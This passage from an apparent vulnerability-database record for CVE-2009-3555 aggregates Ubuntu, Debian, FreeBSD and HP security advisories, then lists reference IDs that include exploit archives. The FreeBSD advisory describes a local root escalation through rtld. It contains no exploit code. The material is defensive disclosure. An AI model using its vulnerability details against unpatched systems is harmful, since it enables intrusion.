http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_i386.deb\n Size/MD5: 17790 6a4afb594384085b41502911476f9d27\n http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_i386.deb\n Size/MD5: 301968 a5f1eb30b4dd64bbac568873ad700887\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_lpia.deb\n Size/MD5: 3220356 1bed6847d860f8dd0a845062cf227322\n http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_lpia.deb\n Size/MD5: 1085226 c5e07d7711f257888071d97ff551f42e\n http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_lpia.deb\n Size/MD5: 259084 d6424f00ee83eaf9abb433768edb37c2\n http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_lpia.deb\n Size/MD5: 17788 217da64905b090392eb4acfa43d282c2\n http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_lpia.deb\n Size/MD5: 297772 7f223b5673372154a73cf84c9ed6bfda\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_powerpc.deb\n Size/MD5: 3330434 d4c4fe0a437c5f2dd20b81df2cf936b5\n http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_powerpc.deb\n Size/MD5: 1202898 b27bda4a282c5b46733dcc21519cc4b6\n http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_powerpc.deb\n Size/MD5: 262126 bb796b31d740e38581a37003a89c18a5\n http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_powerpc.deb\n Size/MD5: 17794 0109fab35491b7f7f6e8d9649acbd728\n http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_powerpc.deb\n Size/MD5: 323344 8e6f667e0df078a4b68d72acddfc3326\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.04.1_sparc.deb\n Size/MD5: 2988064 97a10a1098bc541808ead09dcb1711c5\n http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.04.1_sparc.deb\n Size/MD5: 1074248 4de13c4f7e970d56fa65e6f0e472f320\n http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.04.1_sparc.deb\n Size/MD5: 257214 d1ee26bd6f9e26f93f8b8af403d41b1a\n http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.04.1_sparc.deb\n Size/MD5: 17794 2f08b7d40b6069754762083051c03f27\n http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.04.1_sparc.deb\n Size/MD5: 303452 b1dc3dbcbf441a81ef5005e72ad60620\n\n\n\n-- \nJamie Strandboge | http://www.canonical.com\n. This\nupdate addresses these protocol vulnerabilities in lighttpd. \n\nCVE-2009-3555\n\n Marsh Ray, Steve Dispensa, and Martin Rex discovered that the TLS\n and SSLv3 protocols do not properly associate renegotiation\n handshakes with an existing connection, which allows man-in-the-middle\n attackers to insert data into HTTPS sessions. This issue is solved\n in lighttpd by disabling client initiated renegotiation by default. \n \n Those users that do actually need such renegotiations, can reenable\n them via the new \u0027ssl.disable-client-renegotiation\u0027 parameter. \n\nCVE-2012-4929\n\n Juliano Rizzo and Thai Duong discovered a weakness in the TLS/SSL\n protocol when using compression. This side channel attack, dubbed\n \u0027CRIME\u0027, allows eavesdroppers to gather information to recover the\n original plaintext in the protocol. This update disables compression. \n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.4.28-2+squeeze1.2. \n\nFor the testing distribution (wheezy), and the unstable distribution (sid)\nthese problems have been fixed in version 1.4.30-1. \n\nWe recommend that you upgrade your lighttpd packages. \nCorrected: 2009-12-01 02:59:22 UTC (RELENG_8, 8.0-STABLE)\n 2009-12-03 09:18:40 UTC (RELENG_8_0, 8.0-RELEASE-p1)\n 2009-12-01 03:00:16 UTC (RELENG_7, 7.2-STABLE)\n 2009-12-03 09:18:40 UTC (RELENG_7_2, 7.2-RELEASE-p5)\n 2009-12-03 09:18:40 UTC (RELENG_7_1, 7.1-RELEASE-p9)\nCVE Name: CVE-2009-4146, CVE-2009-4147\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e. \n\nI. Background\n\nThe run-time link-editor, rtld, links dynamic executable with their\nneeded libraries at run-time. It also allows users to explicitly\nload libraries via various LD_ environmental variables. \n\nII. Problem Description\n\nWhen running setuid programs rtld will normally remove potentially\ndangerous environment variables. Due to recent changes in FreeBSD\nenvironment variable handling code, a corrupt environment may\nresult in attempts to unset environment variables failing. \n\nIII. Impact\n\nAn unprivileged user who can execute programs on a system can gain\nthe privileges of any setuid program which he can run. On most\nsystems configurations, this will allow a local attacker to execute\ncode as the root user. \n\nIV. Workaround\n\nNo workaround is available, but systems without untrusted local users,\nwhere all the untrusted local users are jailed superusers, and/or where\nuntrusted users cannot execute arbitrary code (e.g., due to use of read\nonly and noexec mount options) are not affected. \n\nNote that \"untrusted local users\" include users with the ability to\nupload and execute web scripts (CGI, PHP, Python, Perl etc.), as they\nmay be able to exploit this issue. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE,\nor to the RELENG_8_0, RELENG_7_2, or RELENG_7_1 security branch dated\nafter the correction date. \n\n2) To patch your present system:\n\nThe following patches have been verified to apply to FreeBSD 7.1, 7.2,\nand 8.0 systems. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 7.x]\n# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld7.patch\n# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld7.patch.asc\n\n[FreeBSD 8.0]\n# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch\n# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch.asc\n\nb) Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n# cd /usr/src/libexec/rtld-elf\n# make obj \u0026\u0026 make depend \u0026\u0026 make \u0026\u0026 make install\n\nNOTE: On the amd64 platform, the above procedure will not update the\nld-elf32.so.1 (i386 compatibility) run-time link-editor (rtld). On\namd64 systems where the i386 rtld are installed, the operating system\nshould instead be recompiled as described in\n\u003cURL:http://www.FreeBSD.org/handbook/makeworld.html\u003e\n\nVI. Correction details\n\nThe following list contains the revision numbers of each file that was\ncorrected in FreeBSD. \n\nCVS:\n\nBranch Revision\n Path\n- -------------------------------------------------------------------------\nRELENG_7\n src/libexec/rtld-elf/rtld.c 1.124.2.7\nRELENG_7_2\n src/UPDATING 1.507.2.23.2.8\n src/sys/conf/newvers.sh 1.72.2.11.2.9\n src/libexec/rtld-elf/rtld.c 1.124.2.4.2.2\nRELENG_7_1\n src/UPDATING 1.507.2.13.2.12\n src/sys/conf/newvers.sh 1.72.2.9.2.13\n src/libexec/rtld-elf/rtld.c 1.124.2.3.2.2\nRELENG_8\n src/libexec/rtld-elf/rtld.c 1.139.2.4\nRELENG_8_0\n src/UPDATING 1.632.2.7.2.4\n src/sys/conf/newvers.sh 1.83.2.6.2.4\n src/libexec/rtld-elf/rtld.c 1.139.2.2.2.2\n- -------------------------------------------------------------------------\n\nSubversion:\n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/7/ r199981\nreleng/7.2/ r200054\nreleng/7.1/ r200054\nstable/8/ r199980\nreleng/8.0/ r200054\n- -------------------------------------------------------------------------\n\nVII. \nHP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows prior to v6.1. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Service (DoS)\n\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c01945686\nVersion: 1\n\nHPSBUX02482 SSRT090249 rev.1 - HP-UX Running OpenSSL, Remote Unauthorized Data Injection, Denial of\n\nService (DoS)\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2009-11-25\nLast Updated: 2009-11-25\n\nPotential Security Impact: Remote unauthorized data injection, Denial of Service (DoS)\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP-UX OpenSSL. The vulnerability could be exploited\n\nremotely to inject unauthorized data or to create a Denial of Service (DoS). \n\nReferences: CVE-2009-3555\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08l. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2009-3555 (AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided upgrades to resolve this vulnerability. \nThe upgrades are available from the following location. \n\nHOST\n ACCOUNT\n PASSWORD\n\nftp.usa.hp.com\n sb02482\n Secure12\n\nHP-UX Release\n Depot name\n SHA-1 Hash\n\nB.11.11 PA (32 and 64)\n OpenSSL_A.00.09.08l.001_HP-UX_B.11.11_32+64.depot\n 2efb-e45e-78a7-17d0-11e9-5c10-3753-0585-6fde-36c4\n\nB.11.23 (PA and IA)\n OpenSSL_A.00.09.08l.002_HP-UX_B.11.23_IA-PA.depot\n 2794-2f77-48a4-3316-a8b9-d213-7243-8e1b-7336-95a2\n\nB.11.31 (PA and IA)\n OpenSSL_A.00.09.08l.003_HP-UX_B.11.31_IA-PA.depot\n 7be7-25a2-d3c4-0dce-761d-eba0-2782-8788-3bf8-02ca\n\nNote: OpenSSL vA.00.09.08l disables renegotiation. Although renegotiation is thought to be rarely used,\n\napplications should be tested to evaluate the impact of installing OpenSSL vA.00.09.08l. \n\nMANUAL ACTIONS: Yes - Update\n\nInstall OpenSSL A.00.09.08l or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security\n\nPatch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a\n\nspecific HP-UX system. It can also download patches and create a depot automatically. For more information\n\nsee: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\naction: install revision A.00.09.08l.001 or subsequent\n\nHP-UX B.11.23\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-LIB.2\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PRNG.2\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-RUN.2\naction: install revision A.00.09.08l.002 or subsequent\n\nHP-UX B.11.31\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-LIB.2\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PRNG.2\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-RUN.2\naction: install revision A.00.09.08l.003 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) 25 November 2009 Initial release\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n To: security-alert@hp.com\n Subject: get key\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your ITRC security bulletins and patches\n -check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems\n -verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin\nrelates to is represented by the 5th and 6th characters\nof the Bulletin number in the title:\n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\nCopyright 2009 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niEYEARECAAYFAksNs5IACgkQ4B86/C0qfVmJNQCeMd6pno2UZMwhJYB8yaKTw3Ta\nH6EAni+Jh3ebmTxXb0gfH5eefN9xqKO3\n=h0Pb\n-----END PGP SIGNATURE-----\n. \nHP Secure Web Server (SWS) for OpenVMS (based on Apache) V2.1-1 and earlier. \n\nKit Name\n Location\n\nHP SWS V2.2 for OpenVMS Alpha and OpenVMS Integrity servers",
"sources": [
{
"db": "NVD",
"id": "CVE-2009-3555"
},
{
"db": "CERT/CC",
"id": "VU#120541"
},
{
"db": "BID",
"id": "36935"
},
{
"db": "VULMON",
"id": "CVE-2009-3555"
},
{
"db": "PACKETSTORM",
"id": "89136"
},
{
"db": "PACKETSTORM",
"id": "130868"
},
{
"db": "PACKETSTORM",
"id": "100761"
},
{
"db": "PACKETSTORM",
"id": "89026"
},
{
"db": "PACKETSTORM",
"id": "111583"
},
{
"db": "VULHUB",
"id": "VHN-41001"
},
{
"db": "PACKETSTORM",
"id": "119293"
},
{
"db": "PACKETSTORM",
"id": "92095"
},
{
"db": "PACKETSTORM",
"id": "120365"
},
{
"db": "PACKETSTORM",
"id": "83415"
},
{
"db": "PACKETSTORM",
"id": "91749"
},
{
"db": "PACKETSTORM",
"id": "111920"
},
{
"db": "PACKETSTORM",
"id": "83271"
},
{
"db": "PACKETSTORM",
"id": "101257"
}
],
"trust": 3.24
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=10071",
"trust": 0.2,
"type": "exploit"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-41001",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41001"
},
{
"db": "VULMON",
"id": "CVE-2009-3555"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2009-3555",
"trust": 4.1
},
{
"db": "CERT/CC",
"id": "VU#120541",
"trust": 2.9
},
{
"db": "HITACHI",
"id": "HS10-030",
"trust": 2.0
},
{
"db": "BID",
"id": "36935",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "38781",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "42377",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37501",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39632",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37604",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "41972",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "43308",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "38241",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37859",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "40070",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "41818",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39292",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "42816",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "42379",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39317",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "38020",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "42467",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37320",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37640",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37656",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37383",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "42724",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "38003",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "44183",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "42733",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "38484",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "40545",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "40866",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39242",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "38056",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39278",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39243",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "42808",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37675",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39127",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39461",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39819",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37453",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "40747",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "41490",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39628",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "44954",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39500",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "48577",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "42811",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37291",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "41480",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37292",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37399",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39713",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "38687",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "37504",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "39136",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "41967",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023217",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023273",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023274",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023206",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023272",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023427",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023218",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023163",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023214",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023211",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023219",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023216",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1024789",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023148",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023213",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023271",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023243",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023209",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023215",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023208",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023411",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023204",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023224",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023210",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023207",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023426",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023428",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023205",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023275",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023270",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1023212",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-2745",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2009-3353",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-3069",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0086",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2009-3354",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2009-3484",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1793",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2009-3310",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0982",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2011-0033",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2009-3220",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-2010",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1639",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1107",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-3126",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0916",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2009-3164",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2011-0032",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2011-0086",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2009-3313",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0748",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1350",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2009-3521",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0994",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-3086",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1191",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0173",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2009-3587",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0933",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2009-3205",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1054",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0848",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1673",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2009-3165",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2009/11/05/3",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2009/11/07/3",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2009/11/23/10",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2009/11/05/5",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2009/11/20/1",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2009/11/06/3",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "65202",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "62210",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "60521",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "60972",
"trust": 1.7
},
{
"db": "USCERT",
"id": "TA10-222A",
"trust": 1.7
},
{
"db": "USCERT",
"id": "TA10-287A",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200911-069",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2022.2853",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.2561",
"trust": 0.6
},
{
"db": "JUNIPER",
"id": "JSA10939",
"trust": 0.6
},
{
"db": "ICS CERT",
"id": "ICSA-22-160-01",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "130868",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "83271",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "120365",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "83415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "92095",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "89136",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "10071",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "10579",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "82657",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "82770",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "90262",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "88173",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "91309",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "106155",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "111273",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "83414",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "88167",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "124088",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "120714",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "82652",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "94087",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "97489",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "131826",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "95279",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "137201",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "102374",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "106156",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92497",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "88621",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "94088",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "89667",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "88698",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "84112",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "90286",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "127267",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "84183",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "86075",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "114810",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "88224",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "123380",
